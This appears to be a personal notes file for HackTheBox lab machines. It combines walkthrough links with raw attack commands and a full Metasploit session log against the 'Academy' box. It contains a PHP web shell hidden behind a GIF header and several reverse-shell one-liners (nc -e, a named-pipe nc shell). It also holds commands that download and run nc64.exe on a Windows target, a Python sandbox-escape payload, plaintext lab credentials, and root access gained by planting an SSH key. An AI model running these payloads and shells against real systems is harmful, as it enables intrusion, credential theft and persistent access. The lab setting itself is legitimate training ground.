Blunder
https://ethicalhacs.com/blunder-hackthebox-walkthrough/

Lame
https://medium.com/bugbountywriteup/htb-lame-writeup-e47100aea88b
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-lame/

Legacy
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/
https://medium.com/@ranakhalil101/hack-the-box-legacy-writeup-w-o-metasploit-2d552d688336

Admirer
https://atsika.info/htb-admirer/

Dlevel
https://medium.com/@ranakhalil101/hack-the-box-devel-writeup-w-o-metasploit-88cc812794f1

FUSE
tabby
https://phantominfosec.wordpress.com/2020/07/08/htb-tabby-walkthrough/

P.O.O HTB Endgame
https://0xdf.gitlab.io/2020/06/08/endgame-poo.html#local-enumeration


Shocker
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-shocker/


Nest
https://atm-infosec.github.io/hackthebox/2020/06/05/HTB-Nest.html

Jail
https://reboare.github.io/htb/htb-jail.html
https://medium.com/@gabriel.pirjolescu/hack-the-box-jail-write-up-e279862155d4


https://blog.csdn.net/qq_32261191


Travexec
https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-traverxec/

Zero Logon
https://0xdf.gitlab.io/2020/09/17/zerologon-owning-htb-machines-with-cve-2020-1472.html


Doctor
https://www.youtube.com/watch?v=2BvuoWG_r9Y
 svn checkout svn://10.10.10.203
svn diff -r 2

git clone https://github.com/cnotin/SplunkWhisperer2.git
python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh '10.10.14.2' '1234''



Omni Commands

python3 -m http.server 80

https://github.com/SafeBreach-Labs/SirepRAT

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-WebRequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.2/nc64.exe" --v   

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.2 1234 -e powershell.exe" --v  



cd WindowsPowershell\Modules\PackageManagement


type r.bat


net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz


 nc -nlvp 1236

C:\Windows\System32\spooldrivers\color\nc64.exe 10.10.14.2 1235 -e powershell.exe

$credential = Import-CliXml -Path U:\Users\app\user.txt 

 $credential = Import-CliXml -Path U:\Users\administrator\root.txt

$credential.GetNetworkCredential().Password


X11 exploit
https://zachgrace.com/training/x11/


Passage

image.php file
GIF8;                                                                                                                                                                                      
<?php system($_REQUEST['cmd']) ?>

10.10.10.206/CuteNews/uploads/avatar_abc123_image.php?cmd=nc 10.10.14.2 -e /bin/bash 1234

python3 -c 'import pty;pty.spawn("/bin/bash")'

ssh -i id_rsa nadav@passage
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/getting_root/id_rsa 
true 
<.ubuntu.USBCreator.image /root/.ssh/id_rsa /tmp/getting_root/id_rsa true 
()

ssh -i id_rsa root@passage

CTF
https://0xdf.gitlab.io/2019/07/20/htb-ctf.html

https://snovvcrash.rocks/2019/09/20/htb-ctf.html



curl -sv --stderr - 10.10.10.122 | grep Date; date

touch '@me'; ln -sf /root/root.txt me; ls -la; date

otp.py
import time
from datetime import datetime
from subprocess import check_output

import requests

URL = 'http://10.10.10.122'

while True:
        kali = datetime.utcnow()
        server = datetime.strptime(requests.head(URL).headers['Date'], '%a, %d %b %Y %X %Z')
        offset = int((server - kali).total_seconds())

        cmd = [
                'stoken',
                '--token=285449490011357156531651545652335570713167411445727140604172141456711102716717000',
                '--pin=0000',
                f'--use-time={"%+d" % offset}'
        ]

        print(check_output(cmd).decode().strip(), end='\r')
        time.sleep(1)


krypto
ssh -L 81:127.0.0.1:81 rijndael@10.10.10.129 -f -N

python3 e.py 500 "{}.__class__.__mro__[1].__subclasses__()[121].__init__.__globals__['__builtins__']['__import__']('os').system('rm -f /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | nc 10.10.14.36 1234 >/tmp/p')"

import random
import json   
import hashlib
import binascii
from ecdsa import VerifyingKey, SigningKey, NIST384p
import base64
import requests
import sys

# not-so-secure PRNG ;)
def secure_rng(seed):
  # Taken from the internet - probably secure
  p = 2147483647
  g = 2255412

  keyLength = 32
  ret = 0
  ths = round((p-1)/2)
  for i in range(keyLength*8):
    seed = pow(g,seed,p)
    if seed > ths:
      ret += 2**i
  return ret

# sign
def sign(sk, msg):
    return binascii.hexlify(sk.sign(msg))

# Generate n not-so-secure random numbers
def generate_randoms(n):
  randoms = []
  for _ in range(n):
    seed = random.getrandbits(128)
    rand = secure_rng(seed) + 1
    randoms.append(rand)
  return randoms

# generate signing keys
def generate_keys(x):
  keys = []
  for _ in x:
    sk = SigningKey.from_secret_exponent(_, curve=NIST384p)
    keys.append(sk)
  return keys

# generate not-so-secure random numbers
n = int(sys.argv[1])
print("[+] Generating %d not-so-secure random numbers" % n)
random_numbers = generate_randoms(n)
unique_numbers = list(set(random_numbers))
print("[+] We got %d unique numbers" % len(unique_numbers))

# generate signing keys
print("[+] Generating signing keys from unique numbers")
keys = generate_keys(unique_numbers)

# Here goes nothing...
expr = sys.argv[2] # change this to a malicious expression
print("[+] Expression: %s" % expr)

for key in keys:
  json = {'expr': expr, "sig": sign(key, str.encode(expr)).decode()}
  headers = {'Content-Type': 'application/json'}
  r = requests.post('http://127.0.0.1:81/eval', json=json, headers=headers)

  if "Bad" not in r.text and "Error" not in r.text:
    print (r.text)
    exit()

https://hackso.me/kryptos-htb-walkthrough/


Jerry
https://brainweapons.com/2020/06/05/jerry-htb-series/

Blue
ms13-070

Travel
https://0xdf.gitlab.io/2020/09/12/htb-travel.html

Quick
https://0xprashant.github.io/posts/htb-quick/

Optimum
https://ech1.netlify.app/htb/easy/5


lacasadepapel
https://medium.com/@offs3cg33k/lacasadepapel-htb-walkthrough-dce15ab54f79
https://blog.barradell-johns.com/index.php/2019/08/31/htb-lacasadepapel/


Postman
https://sheerazali.com/postman-writeup-walkthrough-hack-the-box/

Silo
https://cyruslab.net/2020/05/08/hacktheboxsilo/
official



-------------------------------------
Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution


msf5 > use 0
msf5 exploit(unix/http/laravel_token_unserialize_exec) > show options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   APP_KEY                     no        The base64 encoded APP_KEY string from the .env file
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to target webapp
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
app_key => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts academy.htb
rhosts => academy.htb
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set lhost tun0
lhost => 10.10.14.7
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
vhost => dev-staging-01.academy.htb
msf5 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.7:4444 
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.215:39620) at 2020-11-10 20:20:02 -0500

whoami
www-data
python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@academy:/var/www/html/htb-academy-dev-01/public$ ls
ls
css  favicon.ico  index.php  js  robots.txt  web.config
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd
cd
bash: cd: HOME not set
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd academy
cd academy
bash: cd: academy: No such file or directory
www-data@academy:/var/www/html/htb-academy-dev-01/public$ env
env
DB_PASSWORD=secret
MAIL_PORT=2525
MAIL_DRIVER=smtp
REDIS_PASSWORD=null
REDIS_HOST=127.0.0.1
MIX_PUSHER_APP_CLUSTER=mt1
PWD=/var/www/html/htb-academy-dev-01/public
CACHE_DRIVER=file
DB_PORT=3306
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PUSHER_APP_CLUSTER=mt1
MAIL_USERNAME=null
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_ENV=local
MAIL_PASSWORD=null
APP_DEBUG=true
INVOCATION_ID=3f94d951bf48412d9512e94119e20ea9
APP_URL=http://localhost
APACHE_PID_FILE=/var/run/apache2/apache2.pid
DB_USERNAME=homestead
PUSHER_APP_ID=
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
PUSHER_APP_KEY=
APACHE_RUN_GROUP=www-data
PUSHER_APP_SECRET=
MIX_PUSHER_APP_KEY=
APACHE_LOCK_DIR=/var/lock/apache2
APP_NAME=Laravel
SHLVL=1
LOG_CHANNEL=stack
BROADCAST_DRIVER=log
REDIS_PORT=6379
LC_CTYPE=C.UTF-8
APACHE_RUN_DIR=/var/run/apache2
SESSION_DRIVER=file
JOURNAL_STREAM=9:22813
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
MAIL_ENCRYPTION=null
MAIL_HOST=smtp.mailtrap.io
DB_DATABASE=homestead
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
_=/usr/bin/env
www-data@academy:/var/www/html/htb-academy-dev-01/public$ 

www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd ..
cd ..
www-data@academy:/var/www/html/htb-academy-dev-01$ ls
ls
app	   composer.json  database	public	   routes      tests
artisan    composer.lock  package.json	readme.md  server.php  vendor
bootstrap  config	  phpunit.xml	resources  storage     webpack.mix.js
www-data@academy:/var/www/html/htb-academy-dev-01$ cd academy	
cd academy
bash: cd: academy: No such file or directory
www-data@academy:/var/www/html/htb-academy-dev-01$ cd ..
cd ..
www-data@academy:/var/www/html$ ls
ls
academy  htb-academy-dev-01  index.php
www-data@academy:/var/www/html$ cd academy
cd academy
www-data@academy:/var/www/html/academy$ ls
ls
app	   composer.json  database	public	   routes      tests
artisan    composer.lock  package.json	readme.md  server.php  vendor
bootstrap  config	  phpunit.xml	resources  storage     webpack.mix.js
www-data@academy:/var/www/html/academy$ ls -la
ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13 12:42 .
drwxr-xr-x  4 root     root       4096 Aug 13 12:36 ..
-rw-r--r--  1 www-data www-data    706 Aug 13 12:42 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
drwxr-xr-x  3 www-data www-data   4096 Feb  7  2018 bootstrap
-rw-r--r--  1 www-data www-data   1512 Feb  7  2018 composer.json
-rw-r--r--  1 www-data www-data 191621 Aug  9 11:57 composer.lock
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 config
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 database
-rw-r--r--  1 www-data www-data   1150 Feb  7  2018 package.json
-rw-r--r--  1 www-data www-data   1040 Feb  7  2018 phpunit.xml
drwxr-xr-x  4 www-data www-data   4096 Nov  9 10:13 public
-rw-r--r--  1 www-data www-data   3622 Feb  7  2018 readme.md
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 resources
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 routes
-rw-r--r--  1 www-data www-data    563 Feb  7  2018 server.php
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 storage
drwxr-xr-x  4 www-data www-data   4096 Feb  7  2018 tests
drwxr-xr-x 38 www-data www-data   4096 Aug  9 11:57 vendor
-rw-r--r--  1 www-data www-data    549 Feb  7  2018 webpack.mix.js
www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
www-data@academy:/var/www/html/academy$ 

www-data@academy:/var/www/html/academy$ ls -al /home
ls -al /home
total 32
drwxr-xr-x  8 root     root     4096 Aug 10 00:34 .
drwxr-xr-x 20 root     root     4096 Aug  7 12:07 ..
drwxr-xr-x  2 21y4d    21y4d    4096 Aug 10 00:34 21y4d
drwxr-xr-x  2 ch4p     ch4p     4096 Aug 10 00:34 ch4p
drwxr-xr-x  4 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 cry0l1t3
drwxr-xr-x  3 egre55   egre55   4096 Aug 10 23:41 egre55
drwxr-xr-x  2 g0blin   g0blin   4096 Aug 10 00:34 g0blin
drwxr-xr-x  5 mrb3n    mrb3n    4096 Aug 12 22:19 mrb3n
www-data@academy:/var/www/html/academy$ su cy0l1t3
su cy0l1t3
su: user cy0l1t3 does not exist
www-data@academy:/var/www/html/academy$ su cry0l1t3
su cry0l1t3
Password: mySup3rP4s5w0rd!!

$ whoami
whoami
cry0l1t3
$ ^C
Abort session 1? [y/N]  y
""

[*] 10.10.10.215 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/http/laravel_token_unserialize_exec) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf5 exploit(unix/http/laravel_token_unserialize_exec) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf5 exploit(unix/http/laravel_token_unserialize_exec) > exit -y
root@kali:~/Downloads# ssh-keygen -f id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
root@kali:~/Downloads# cat id_rsa.pub
root@kali:~/Downloads# 



root@kali:~/Downloads# ssh cry0l1t3
ssh: Could not resolve hostname cry0l1t3: Name or service not known
root@kali:~/Downloads# ssh cry0l1t3@academy.htb
The authenticity of host 'academy.htb (10.10.10.215)' can't be established.
ECDSA key fingerprint is SHA256:4v7BvR4VfuEwrmXljKvXmF+JjLCgP/46G78oNEHzt2c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'academy.htb,10.10.10.215' (ECDSA) to the list of known hosts.
cry0l1t3@academy.htb's password: 

Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2
$ 
$ 
$ 
$ ls
user.txt
$ groups
cry0l1t3 adm
$ cd /avr/log/audit
-sh: 7: cd: can't cd to /avr/log/audit
$ ls
user.txt
$ cat audit.lo.3 | grep "uid=1002 | more"
cat: audit.lo.3: No such file or directory
$ ls  
user.txt
$ cat audit.log.3
cat: audit.log.3: No such file or directory
$ cat /var/log/audit.log.3 | grep "uid=1002" | more
cat: /var/log/audit.log.3: No such file or directory
$ cd /var/log/audit
$ ls
audit.log  audit.log.1	audit.log.2  audit.log.3
$ cat audit.log.3 | grep "uid=1002" | more
$ su mrb3n
Password: 
$ ls
ls: cannot open directory '.': Permission denied
$ whoami
mrb3n
$ sudo -l
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
$ cd ~
$ ls
$ nnao composer.json
$ nano composer.json
$ sudo composer run-script command> mkdir /root/.ssh; echo 'ssh-rsa kry' >> /root/.ssh/authorized_keys
mkdir: cannot create directory ‘/root/.ssh’: File exists
$ ls      
composer.json
$ nano composer.json
$ ls
composer.json
$ pwd
/home/mrb3n
$ nano composer.json


Use "fg" to return to nano.
[1] + Stopped (signal)           nano composer.json
$ ls
$ ls -l
total 0
$ cd ~
$ ls
$ 
$ whoami
mrb3n
$ 
$ exit
You have stopped jobs.
$ exit
Received SIGHUP or SIGTERM
$ exit
Connection to academy.htb closed.
root@kali:~/Downloads# ssh -i id_rsa root@academy.htb

Last login: Mon Nov  9 10:11:49 2020
root@academy:~# ls
academy.txt  root.txt  snap
root@academy:~# cat root.txt 
root@academy:~# 
